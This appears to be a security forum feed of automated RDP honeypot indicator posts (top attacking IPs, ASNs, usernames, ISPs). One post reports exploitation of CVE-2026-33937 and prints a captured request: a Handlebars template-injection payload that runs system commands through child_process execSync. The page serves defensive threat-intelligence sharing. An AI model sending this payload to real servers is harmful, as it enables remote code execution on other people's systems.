CIRCLE WITH A DOT

Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode.

Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript).

R

2026-05-21 RDP #Honeypot IOCs - 468 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec
Watching Ignoring Scheduled Pinned Locked Moved Uncategorized honeypot dfir infosec cybersec soc
1

0 Votes

1 Posts

0 Views

R

2026-05-21 RDP #Honeypot IOCs - 468 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 276193.169.194.14 - 57111.170.152.113 - 15Top ASNs:AS51784 - 276AS214576 - 57AS396982 - 45Top Accounts:hello - 309(empty) - 57Test - 30Top ISPs:X-city Customers and Private - 276Berdiev Ruslan Mukhabatovich - 57Google LLC - 45Top Clients:Unknown - 468Top Software:Unknown - 468Top Keyboards:Unknown - 468Top IP Classification:Unknown - 408hosting - 48hosting & proxy - 12Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security
R

2026-05-21 RDP #Honeypot IOCs - 312 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec
Watching Ignoring Scheduled Pinned Locked Moved Uncategorized honeypot dfir infosec cybersec soc
1

0 Votes

1 Posts

0 Views

R

2026-05-21 RDP #Honeypot IOCs - 312 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 184193.169.194.14 - 38111.170.152.113 - 10Top ASNs:AS51784 - 184AS214576 - 38AS396982 - 30Top Accounts:hello - 206(empty) - 38Test - 20Top ISPs:X-city Customers and Private - 184Berdiev Ruslan Mukhabatovich - 38Google LLC - 30Top Clients:Unknown - 312Top Software:Unknown - 312Top Keyboards:Unknown - 312Top IP Classification:Unknown - 272hosting - 32hosting & proxy - 8Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security
R

2026-05-21 RDP #Honeypot IOCs - 156 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec
Watching Ignoring Scheduled Pinned Locked Moved Uncategorized honeypot dfir infosec cybersec soc
1

0 Votes

1 Posts

0 Views

R

2026-05-21 RDP #Honeypot IOCs - 156 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 92193.169.194.14 - 19111.170.152.113 - 5Top ASNs:AS51784 - 92AS214576 - 19AS396982 - 15Top Accounts:hello - 103(empty) - 19Test - 10Top ISPs:X-city Customers and Private - 92Berdiev Ruslan Mukhabatovich - 19Google LLC - 15Top Clients:Unknown - 156Top Software:Unknown - 156Top Keyboards:Unknown - 156Top IP Classification:Unknown - 136hosting - 16hosting & proxy - 4Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security
R

2026-05-19 RDP #Honeypot IOCs - 420 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec
Watching Ignoring Scheduled Pinned Locked Moved Uncategorized honeypot dfir infosec cybersec soc
1

0 Votes

1 Posts

0 Views

R

2026-05-19 RDP #Honeypot IOCs - 420 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 99193.169.194.14 - 63124.222.173.104 - 57Top ASNs:AS51784 - 99AS214576 - 63AS45090 - 57Top Accounts:hello - 204(empty) - 66Test - 36Top ISPs:X-city Customers and Private - 99Berdiev Ruslan Mukhabatovich - 63China Internet Network Information Center - 57Top Clients:Unknown - 420Top Software:Unknown - 420Top Keyboards:Unknown - 420Top IP Classification:Unknown - 303hosting - 90proxy - 24Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security
R

2026-05-08 RDP #Honeypot IOCs - 300 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec
Watching Ignoring Scheduled Pinned Locked Moved Uncategorized honeypot dfir infosec cybersec soc
1

0 Votes

1 Posts

0 Views

R

2026-05-08 RDP #Honeypot IOCs - 300 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 45104.248.62.230 - 45160.187.146.221 - 30Top ASNs:AS14061 - 48AS51784 - 45AS63949 - 42Top Accounts:hello - 156Test - 39eltons - 15Top ISPs:DigitalOcean, LLC - 48X-city Customers and Private - 45Akamai Technologies, Inc. - 42Top Clients:Unknown - 300Top Software:Unknown - 300Top Keyboards:Unknown - 300Top IP Classification:Unknown - 153hosting - 135proxy - 12Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security
R

2026-05-08 RDP #Honeypot IOCs - 200 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec
Watching Ignoring Scheduled Pinned Locked Moved Uncategorized honeypot dfir infosec cybersec soc
1

0 Votes

1 Posts

0 Views

R

2026-05-08 RDP #Honeypot IOCs - 200 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSecTop IPs:46.63.101.233 - 30104.248.62.230 - 30160.187.146.221 - 20Top ASNs:AS14061 - 32AS51784 - 30AS63949 - 28Top Accounts:hello - 104Test - 26eltons - 10Top ISPs:DigitalOcean, LLC - 32X-city Customers and Private - 30Akamai Technologies, Inc. - 28Top Clients:Unknown - 200Top Software:Unknown - 200Top Keyboards:Unknown - 200Top IP Classification:Unknown - 102hosting - 90proxy - 8Pastebin links with full 24-hr RDP Honeypot IOC Lists:Bad API request, invalid api_dev_key#CyberSec #SOC #Blueteam #SecOps #Security
H

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937
Watching Ignoring Scheduled Pinned Locked Moved Uncategorized dfir honeypot infosec cybersecurity
1

0 Votes

1 Posts

0 Views

H

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937 Here is a full request:POST /api/email/preview HTTP/1.1Host: x.x.x.x:8080Connection: closeContent-Length: 585Content-Type: application/jsonUser-Agent: Go-http-client/1.1{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}#dfir #honeypot #infosec #cybersecurity

CIRCLE WITH A DOT

2026-05-21 RDP #Honeypot IOCs - 468 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec

2026-05-21 RDP #Honeypot IOCs - 312 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec

2026-05-21 RDP #Honeypot IOCs - 156 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec

2026-05-19 RDP #Honeypot IOCs - 420 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec

2026-05-08 RDP #Honeypot IOCs - 300 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec

2026-05-08 RDP #Honeypot IOCs - 200 scansThread with top 3 features in each category and links to the full dataset#DFIR #InfoSec

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937